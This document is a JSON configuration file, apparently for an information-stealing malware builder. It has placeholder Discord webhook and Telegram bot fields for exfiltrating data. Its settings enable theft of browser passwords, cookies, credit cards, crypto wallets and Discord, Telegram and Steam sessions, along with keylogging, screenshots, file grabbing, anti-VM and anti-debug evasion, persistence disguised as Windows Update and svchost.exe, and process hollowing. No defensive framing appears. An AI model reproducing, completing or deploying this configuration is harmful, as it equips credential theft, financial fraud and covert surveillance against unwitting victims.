{
    "webhook": "https://discord.com/api/webhooks/REPLACE_WITH_YOUR_WEBHOOK",
    "backup_webhook": "https://discord.com/api/webhooks/REPLACE_WITH_BACKUP_WEBHOOK",
    "telegram_token": "REPLACE_WITH_TELEGRAM_BOT_TOKEN",
    "telegram_chat_id": "REPLACE_WITH_TELEGRAM_CHAT_ID",
    "ftp_host": "",
    "ftp_user": "",
    "ftp_pass": "",
    "encryption_key": "REPLACE_WITH_RANDOM_32_CHAR_STRING",
    "exfil_mode": "discord",
    "sleep_time": 5,
    "jitter": 3,
    "max_retries": 5,
    "retry_delay": 10,
    "anti_vm": true,
    "anti_debug": true,
    "anti_analysis": true,
    "anti_sandbox": true,
    "check_ram": true,
    "min_ram_gb": 4,
    "check_cores": true,
    "min_cores": 2,
    "check_resolution": true,
    "min_width": 800,
    "min_height": 600,
    "steal_cookies": true,
    "steal_passwords": true,
    "steal_autofill": true,
    "steal_history": false,
    "steal_bookmarks": false,
    "steal_credit_cards": true,
    "steal_wallets": true,
    "wallets_to_target": [
        "metamask",
        "exodus",
        "atomic",
        "electrum",
        "bitcoin_core",
        "coinbase",
        "trust_wallet",
        "phantom",
        "brave_wallet"
    ],
    "steal_discord": true,
    "discord_methods": [
        "token",
        "localstorage",
        "leveldb"
    ],
    "discord_webhook_spread": false,
    "steal_telegram": true,
    "telegram_paths": [
        "tdata",
        "sessions"
    ],
    "steal_steam": true,
    "steam_paths": [
        "config",
        "ssfn"
    ],
    "file_grabber": true,
    "file_extensions": [
        ".txt",
        ".pdf",
        ".doc",
        ".docx",
        ".xls",
        ".xlsx",
        ".ppt",
        ".pptx",
        ".csv",
        ".json",
        ".xml",
        ".png",
        ".jpg",
        ".jpeg",
        ".wallet",
        ".dat",
        ".key",
        ".pem",
        ".ovpn",
        ".rdp",
        ".sql",
        ".db"
    ],
    "file_grabber_directories": [
        "Desktop",
        "Documents",
        "Downloads",
        "AppData"
    ],
    "max_file_size": 5242880,
    "max_total_files": 50,
    "keylogger": true,
    "keylogger_log_clipboard": true,
    "keylogger_log_window_titles": true,
    "keylogger_send_interval_minutes": 30,
    "keylogger_buffer_size": 1000,
    "screenshot": true,
    "screenshot_quality": 80,
    "screenshot_interval_seconds": 300,
    "clipboard": true,
    "clipboard_check_interval_seconds": 10,
    "webcam": false,
    "webcam_resolution": "640x480",
    "webcam_interval_seconds": 600,
    "persistence": true,
    "persistence_methods": [
        "registry",
        "scheduled_task",
        "startup_folder",
        "wmi_event"
    ],
    "persistence_registry_key": "WindowsUpdate",
    "persistence_scheduled_task_name": "WindowsUpdateTask",
    "persistence_file_name": "svchost.exe",
    "process_injection": true,
    "injection_target_processes": [
        "explorer.exe",
        "chrome.exe",
        "firefox.exe",
        "notepad.exe",
        "svchost.exe"
    ],
    "injection_method": "process_hollowing",
    "obfuscation": true,
    "obfuscation_methods": [
        "string_encoding",
        "control_flow_flattening",
        "dead_code_insertion",
        "variable_renaming"
    ],
    "use_custom_packer": true,
    "packer_compression": true,
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "request_timeout": 30,
    "fake_error_message": false,
    "fake_error_title": "Error",
    "fake_error_text": "The application failed to start because its side-by-side configuration is incorrect.",
    "melt_after_execution": false,
    "self_destruct": false,
    "self_destruct_timer_days": 7,
    "spread_methods": {
        "usb_spread": false,
        "network_spread": false,
        "email_spread": false
    },
    "logging": false,
    "log_file": "debug.log",
    "log_level": "INFO"
}